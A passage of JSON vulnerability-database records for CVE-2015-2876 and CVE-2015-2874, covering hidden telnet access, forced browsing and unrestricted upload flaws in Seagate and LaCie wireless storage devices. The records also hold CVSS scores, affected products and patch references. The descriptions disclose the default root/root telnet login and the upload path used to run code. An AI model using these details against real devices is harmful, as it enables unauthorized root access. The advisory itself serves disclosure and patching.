          },
          {
            "model": "lac9000436u",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "lacie",
            "version": "2.3.0.014"
          },
          {
            "model": "wireless plus mobile storage",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "seagate",
            "version": "*"
          },
          {
            "model": "lac9000464u",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "lacie",
            "version": "2.3.0.014"
          },
          {
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "lacie",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "seagate",
            "version": null
          },
          {
            "model": "fuel",
            "scope": null,
            "trust": 0.8,
            "vendor": "lacie",
            "version": null
          },
          {
            "model": "goflex satellite",
            "scope": null,
            "trust": 0.8,
            "vendor": "seagate",
            "version": null
          },
          {
            "model": "goflex sattelite",
            "scope": null,
            "trust": 0.6,
            "vendor": "seagate",
            "version": null
          },
          {
            "model": "technology llc seagate 36c",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "seagate",
            "version": "2.3.0.014"
          },
          {
            "model": "technology llc seagate 36c",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "seagate",
            "version": "2.2.0.005"
          },
          {
            "model": "technology llc seagate 36c",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "seagate",
            "version": "3.4.1.105"
          }
        ],
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#903500"
          },
          {
            "db": "BID",
            "id": "76547"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2015-006526"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201509-209"
          },
          {
            "db": "NVD",
            "id": "CVE-2015-2876"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "cpe_match": [
                  {
                    "cpe22Uri": "cpe:/h:lacie:lacie_fuel",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:seagate:goflex_sattelite",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:seagate:wireless_mobile_storage",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:seagate:wireless_plus_mobile_storage",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2015-006526"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Mike Baucom, Allen Harper, and J. Rach of Tangible Security",
        "sources": [
          {
            "db": "BID",
            "id": "76547"
          }
        ],
        "trust": 0.3
      },
      "cve": "CVE-2015-2876",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "ADJACENT_NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "COMPLETE",
                "baseScore": 8.3,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 6.5,
                "id": "CVE-2015-2876",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 1.0,
                "vectorString": "AV:A/AC:L/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "acInsufInfo": null,
                "accessComplexity": "Low",
                "accessVector": "Network",
                "authentication": "Single",
                "author": "IPA",
                "availabilityImpact": "Complete",
                "baseScore": 9.0,
                "confidentialityImpact": "Complete",
                "exploitabilityScore": null,
                "id": "JVNDB-2015-006526",
                "impactScore": null,
                "integrityImpact": "Complete",
                "obtainAllPrivilege": null,
                "obtainOtherPrivilege": null,
                "obtainUserPrivilege": null,
                "severity": "High",
                "trust": 0.8,
                "userInteractionRequired": null,
                "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "ADJACENT_NETWORK",
                "authentication": "NONE",
                "author": "VULHUB",
                "availabilityImpact": "COMPLETE",
                "baseScore": 8.3,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 6.5,
                "id": "VHN-80837",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 0.1,
                "vectorString": "AV:A/AC:L/AU:N/C:C/I:C/A:C",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "ADJACENT",
                "author": "nvd@nist.gov",
                "availabilityImpact": "HIGH",
                "baseScore": 8.8,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 2.8,
                "id": "CVE-2015-2876",
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2015-2876",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "IPA",
                "id": "JVNDB-2015-006526",
                "trust": 0.8,
                "value": "High"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201509-209",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "VULHUB",
                "id": "VHN-80837",
                "trust": 0.1,
                "value": "HIGH"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-80837"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2015-006526"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201509-209"
          },
          {
            "db": "NVD",
            "id": "CVE-2015-2876"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Unrestricted file upload vulnerability on Seagate GoFlex Satellite, Seagate Wireless Mobile Storage, Seagate Wireless Plus Mobile Storage, and LaCie FUEL devices with firmware before 3.4.1.105 allows remote attackers to execute arbitrary code by uploading a file to /media/sda2 during a Wi-Fi session. Seagate There are multiple vulnerabilities in the wireless storage products offered by. Authentication information ( password ) Is hard-coded (CWE-798) - CVE-2015-2874 Not described in manual telnet Service is up and username \"root\" , Accessible using the default password. CWE-798: Use of Hard-coded Credentials https://cwe.mitre.org/data/definitions/798.html In addition, National Vulnerability Database (NVD) Then CWE-255 It is published as Send request directly (Forced Browsing) (CWE-425) - CVE-2015-2875 By default, anyone can download files when accessing the device wirelessly. Any file on the file system can be downloaded directly. CWE-425: Direct Request (\u0027Forced Browsing\u0027) https://cwe.mitre.org/data/definitions/425.html In addition, National Vulnerability Database (NVD) Then CWE-22 It is published as Unlimited upload of dangerous types of files (CWE-434) - CVE-2015-2876 When accessing the device wirelessly with default settings, /media/sda2 You can upload files to the file system. This file system is prepared for file sharing. CWE-434: Unrestricted Upload of File with Dangerous Type https://cwe.mitre.org/data/definitions/434.htmlA remote attacker can access arbitrary files on the product, root It may be operated with authority. \nSeagate 36C running firmware versions 2.2.0.005 and 2.3.0.014 are vulnerable",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2015-2876"
          },
          {
            "db": "CERT/CC",
            "id": "VU#903500"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2015-006526"
          },
          {
            "db": "BID",
            "id": "76547"
          },
          {
            "db": "VULHUB",
            "id": "VHN-80837"
          }
        ],
        "trust": 2.7
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "CERT/CC",
            "id": "VU#903500",
            "trust": 3.6
          },
          {
            "db": "NVD",
            "id": "CVE-2015-2876",
            "trust": 2.8
          },
          {
            "db": "JVN",
            "id": "JVNVU92833570",
            "trust": 0.8
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2015-006526",
            "trust": 0.8
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201509-209",
            "trust": 0.7
          },
          {
            "db": "BID",
            "id": "76547",
            "trust": 0.3
          },
          {
            "db": "VULHUB",
            "id": "VHN-80837",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#903500"
          },
          {
            "db": "VULHUB",
            "id": "VHN-80837"
          },
          {
            "db": "BID",
            "id": "76547"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2015-006526"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201509-209"
          },
          {
            "db": "NVD",
            "id": "CVE-2015-2876"
          }
        ]
      },
      "id": "VAR-201512-0526",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-80837"
          }
        ],
        "trust": 0.01
      },
      "last_update_date": "2025-04-13T21:32:34.288000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "Firmware Updates for Seagate Products",
            "trust": 0.8,
            "url": "http://knowledge.seagate.com/articles/en_US/FAQ/207931en"
          },
          {
            "title": "Multiple Seagate Fixes for wireless storage products without restricting file upload vulnerabilities",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=57746"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2015-006526"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201509-209"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "NVD-CWE-Other",
            "trust": 1.0
          },
          {
            "problemtype": "CWE-Other",
            "trust": 0.8
          },
          {
            "problemtype": "CWE-22",
            "trust": 0.8
          },
          {
            "problemtype": "CWE-255",
            "trust": 0.8
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2015-006526"
          },
          {
            "db": "NVD",
            "id": "CVE-2015-2876"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.8,
            "url": "https://www.kb.cert.org/vuls/id/903500"
          },
          {
            "trust": 2.5,
            "url": "https://www.kb.cert.org/vuls/id/gwan-9zgtuh"
          },
          {
            "trust": 2.5,
            "url": "https://www.kb.cert.org/vuls/id/gwan-a26l3f"
          },
          {
            "trust": 1.4,
            "url": "https://apps1.seagate.com/downloads/request.html"
          },
          {
            "trust": 1.4,
            "url": "http://knowledge.seagate.com/articles/en_us/faq/207931en"
          },
          {
            "trust": 0.8,
            "url": "http://cwe.mitre.org/data/definitions/425.html"
          },
          {
            "trust": 0.8,
            "url": "http://cwe.mitre.org/data/definitions/434.html"
          },
          {
            "trust": 0.8,
            "url": "http://cwe.mitre.org/data/definitions/798.html"
          },
          {
            "trust": 0.8,
            "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-2874"
          },
          {
            "trust": 0.8,
            "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-2875"
          },
          {
            "trust": 0.8,
            "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-2876"
          },
          {
            "trust": 0.8,
            "url": "http://jvn.jp/vu/jvnvu92833570/index.html"
          },
          {
            "trust": 0.8,
            "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2015-2874"
          },
          {
            "trust": 0.8,
            "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2015-2875"
          },
          {
            "trust": 0.8,
            "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2015-2876"
          },
          {
            "trust": 0.3,
            "url": "http://www.seagate.com/in/en/"
          }
        ],
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#903500"
          },
          {
            "db": "VULHUB",
            "id": "VHN-80837"
          },
          {
            "db": "BID",
            "id": "76547"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2015-006526"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201509-209"
          },
          {
            "db": "NVD",
            "id": "CVE-2015-2876"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "CERT/CC",
            "id": "VU#903500"
          },
          {
            "db": "VULHUB",
            "id": "VHN-80837"
          },
          {
            "db": "BID",
            "id": "76547"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2015-006526"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201509-209"
          },
          {
            "db": "NVD",
            "id": "CVE-2015-2876"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2015-09-01T00:00:00",
            "db": "CERT/CC",
            "id": "VU#903500"
          },
          {
            "date": "2015-12-31T00:00:00",
            "db": "VULHUB",
            "id": "VHN-80837"
          },
          {
            "date": "2015-09-01T00:00:00",
            "db": "BID",
            "id": "76547"
          },
          {
            "date": "2015-12-28T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2015-006526"
          },
          {
            "date": "2015-09-17T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201509-209"
          },
          {
            "date": "2015-12-31T05:59:04.737000",
            "db": "NVD",
            "id": "CVE-2015-2876"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2015-12-08T00:00:00",
            "db": "CERT/CC",
            "id": "VU#903500"
          },
          {
            "date": "2015-12-31T00:00:00",
            "db": "VULHUB",
            "id": "VHN-80837"
          },
          {
            "date": "2015-09-01T00:00:00",
            "db": "BID",
            "id": "76547"
          },
          {
            "date": "2016-01-14T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2015-006526"
          },
          {
            "date": "2016-01-04T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201509-209"
          },
          {
            "date": "2025-04-12T10:46:40.837000",
            "db": "NVD",
            "id": "CVE-2015-2876"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "specific network environment",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201509-209"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Seagate and LaCie wireless storage products contain multiple vulnerabilities",
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#903500"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "other",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201509-209"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-201512-0524

    Vulnerability from variot - Updated: 2025-04-13 20:55

    Seagate GoFlex Satellite, Seagate Wireless Mobile Storage, Seagate Wireless Plus Mobile Storage, and LaCie FUEL devices with firmware before 3.4.1.105 have a default password of root for the root account, which allows remote attackers to obtain administrative access via a TELNET session. There are multiple vulnerabilities in the wireless storage products offered by Seagate. Hard-coded authentication information (password) (CWE-798) - CVE-2015-2874: A telnet service that is not described in the manual is running and is accessible with the username "root" and the default password. CWE-798: Use of Hard-coded Credentials https://cwe.mitre.org/data/definitions/798.html The National Vulnerability Database (NVD) publishes this issue as CWE-255. Direct request (Forced Browsing) (CWE-425) - CVE-2015-2875: By default, anyone can download files when accessing the device wirelessly. Any file on the file system can be downloaded directly. CWE-425: Direct Request ('Forced Browsing') https://cwe.mitre.org/data/definitions/425.html The National Vulnerability Database (NVD) publishes this issue as CWE-22. Unrestricted upload of dangerous file types (CWE-434) - CVE-2015-2876: When accessing the device wirelessly with default settings, files can be uploaded to the /media/sda2 file system. This file system is reserved for file sharing. CWE-434: Unrestricted Upload of File with Dangerous Type https://cwe.mitre.org/data/definitions/434.html A remote attacker can access arbitrary files on the product, and the product may be operated with root privileges. Seagate 36C running firmware versions 2.2.0.005 and 2.3.0.014 are vulnerable. A remote attacker can exploit this vulnerability through a TELNET session to gain administrator privileges.


    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-201512-0524",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "wireless mobile storage",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "seagate",
            "version": "*"
          },
          {
            "model": "goflex sattelite",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "seagate",
            "version": "*"
          },
          {
            "model": "wireless plus mobile storage",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "seagate",
            "version": "*"
          },
          {
            "model": "lac9000436u",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "lacie",
            "version": "2.3.0.014"
          },
          {
            "model": "lac9000464u",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "lacie",
            "version": "2.3.0.014"
          },
          {
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "lacie",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "seagate",
            "version": null
          },
          {
            "model": "fuel",
            "scope": null,
            "trust": 0.8,
            "vendor": "lacie",
            "version": null
          },
          {
            "model": "goflex satellite",
            "scope": null,
            "trust": 0.8,
            "vendor": "seagate",
            "version": null
          },
          {
            "model": "wireless mobile storage",
            "scope": null,
            "trust": 0.8,
            "vendor": "seagate",
            "version": null
          },
          {
            "model": "wireless plus mobile storage",
            "scope": null,
            "trust": 0.8,
            "vendor": "seagate",
            "version": null
          },
          {
            "model": "lac9000464u",
            "scope": null,
            "trust": 0.6,
            "vendor": "lacie",
            "version": null
          },
          {
            "model": "technology llc seagate 36c",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "seagate",
            "version": "2.3.0.014"
          },
          {
            "model": "technology llc seagate 36c",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "seagate",
            "version": "2.2.0.005"
          },
          {
            "model": "technology llc seagate 36c",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "seagate",
            "version": "3.4.1.105"
          }
        ],
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#903500"
          },
          {
            "db": "BID",
            "id": "76547"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2015-006526"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201509-207"
          },
          {
            "db": "NVD",
            "id": "CVE-2015-2874"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "cpe_match": [
                  {
                    "cpe22Uri": "cpe:/h:lacie:lacie_fuel",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:seagate:goflex_sattelite",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:seagate:wireless_mobile_storage",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:seagate:wireless_plus_mobile_storage",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2015-006526"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Mike Baucom, Allen Harper, and J. Rach of Tangible Security",
        "sources": [
          {
            "db": "BID",
            "id": "76547"
          }
        ],
        "trust": 0.3
      },
      "cve": "CVE-2015-2874",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "COMPLETE",
                "baseScore": 10.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "CVE-2015-2874",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 1.0,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "acInsufInfo": null,
                "accessComplexity": "Low",
                "accessVector": "Network",
                "authentication": "Single",
                "author": "IPA",
                "availabilityImpact": "Complete",
                "baseScore": 9.0,
                "confidentialityImpact": "Complete",
                "exploitabilityScore": null,
                "id": "JVNDB-2015-006526",
                "impactScore": null,
                "integrityImpact": "Complete",
                "obtainAllPrivilege": null,
                "obtainOtherPrivilege": null,
                "obtainUserPrivilege": null,
                "severity": "High",
                "trust": 0.8,
                "userInteractionRequired": null,
                "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "VULHUB",
                "availabilityImpact": "COMPLETE",
                "baseScore": 10.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "VHN-80835",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 0.1,
                "vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "HIGH",
                "baseScore": 9.8,
                "baseSeverity": "CRITICAL",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 3.9,
                "id": "CVE-2015-2874",
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2015-2874",
                "trust": 1.0,
                "value": "CRITICAL"
              },
              {
                "author": "IPA",
                "id": "JVNDB-2015-006526",
                "trust": 0.8,
                "value": "High"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201509-207",
                "trust": 0.6,
                "value": "CRITICAL"
              },
              {
                "author": "VULHUB",
                "id": "VHN-80835",
                "trust": 0.1,
                "value": "HIGH"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-80835"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2015-006526"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201509-207"
          },
          {
            "db": "NVD",
            "id": "CVE-2015-2874"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Seagate GoFlex Satellite, Seagate Wireless Mobile Storage, Seagate Wireless Plus Mobile Storage, and LaCie FUEL devices with firmware before 3.4.1.105 have a default password of root for the root account, which allows remote attackers to obtain administrative access via a TELNET session. Seagate There are multiple vulnerabilities in the wireless storage products offered by. Authentication information ( password ) Is hard-coded (CWE-798) - CVE-2015-2874 Not described in manual telnet Service is up and username \"root\" , Accessible using the default password. CWE-798: Use of Hard-coded Credentials https://cwe.mitre.org/data/definitions/798.html In addition, National Vulnerability Database (NVD) Then CWE-255 It is published as Send request directly (Forced Browsing) (CWE-425) - CVE-2015-2875 By default, anyone can download files when accessing the device wirelessly. Any file on the file system can be downloaded directly. CWE-425: Direct Request (\u0027Forced Browsing\u0027) https://cwe.mitre.org/data/definitions/425.html In addition, National Vulnerability Database (NVD) Then CWE-22 It is published as Unlimited upload of dangerous types of files (CWE-434) - CVE-2015-2876 When accessing the device wirelessly with default settings, /media/sda2 You can upload files to the file system. This file system is prepared for file sharing. CWE-434: Unrestricted Upload of File with Dangerous Type https://cwe.mitre.org/data/definitions/434.htmlA remote attacker can access arbitrary files on the product, root It may be operated with authority. \nSeagate 36C running firmware versions 2.2.0.005 and 2.3.0.014 are vulnerable. A remote attacker can TELNET A session exploits this vulnerability to gain administrator privileges",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2015-2874"
          },
          {
            "db": "CERT/CC",
            "id": "VU#903500"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2015-006526"
          },
          {
            "db": "BID",
            "id": "76547"
          },
          {
            "db": "VULHUB",
            "id": "VHN-80835"
          }
        ],
        "trust": 2.7
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
